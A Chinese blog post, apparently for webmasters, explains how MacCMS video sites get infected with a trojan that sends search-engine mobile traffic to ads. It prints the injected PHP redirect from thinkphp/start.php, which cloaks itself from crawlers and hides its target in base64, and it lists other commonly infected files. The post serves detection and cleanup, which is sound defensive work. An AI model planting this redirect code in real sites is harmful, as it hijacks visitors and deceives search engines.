苹果CMS网站被挂马,搜索引擎进来跳转广告?随机触发跳转怎么办


------正文内容展示,开始汲取新知识啦------

影视行业用苹果CMS做站的人比较多,不少人在不愿意接广告情况下被强制挂马。

这种木马最常见在什么目录呢?建议每个站长都排查一下下面路径文件,没流量就不用查了

搜索引擎跳转广告就查
thinkphp/start.php
下面是木马重定向代码,根据条件随机触发跳转

$agentt = strtolower($_SERVER['HTTP_USER_AGENT']);
if(stripos($agentt,'spider') == false && stripos($agentt,'bot')== false) {
if(strpos($agentt, 'ios') || stripos($agentt, 'android') || stripos($agentt, 'iphone') || stripos($agentt, 'ipad'))        {
$laiyuan=@strtolower($_SERVER['HTTP_REFERER']);
if (strpos($laiyuan, 'baidu') || stripos($laiyuan, '360')|| stripos($laiyuan, 'google')|| stripos($laiyuan, 'cn')|| stripos($laiyuan, 'com') ||stripos($laiyuan, 'sogou') || stripos($laiyuan, 'so'))  {
$new_url=base64_decode('aHR0cHM6Ly9oZXhpZXlzLmNvbS9nLnBocA==');
header("Location:$new_url");
exit;
}   
}
}

其他常见挂马文件路径

application/extra/

static/js/player.js

static/js/jquery.js

d2b5ca33bd20240325013617

 

温馨提示:本文最后更新于2024-03-25 01:36:44,某些文章具有时效性,若有错误或已失效,请私信客服或联系知新社长
------本文内容已结束,喜欢请分享------

感谢您的访问,Ctrl+D收藏本站吧。

© 版权声明
三月 25

知岛上的今时往日

THE END
点赞0投币 分享
评论 抢沙发
头像
善语结善缘,恶言伤人心。(禁止发送无意义的字符)
提交
头像

昵称

夸夸Ta
夸夸
还有吗!没看够!
取消
昵称表情代码图片

    暂无评论内容

社区求救信号帮助是一种美德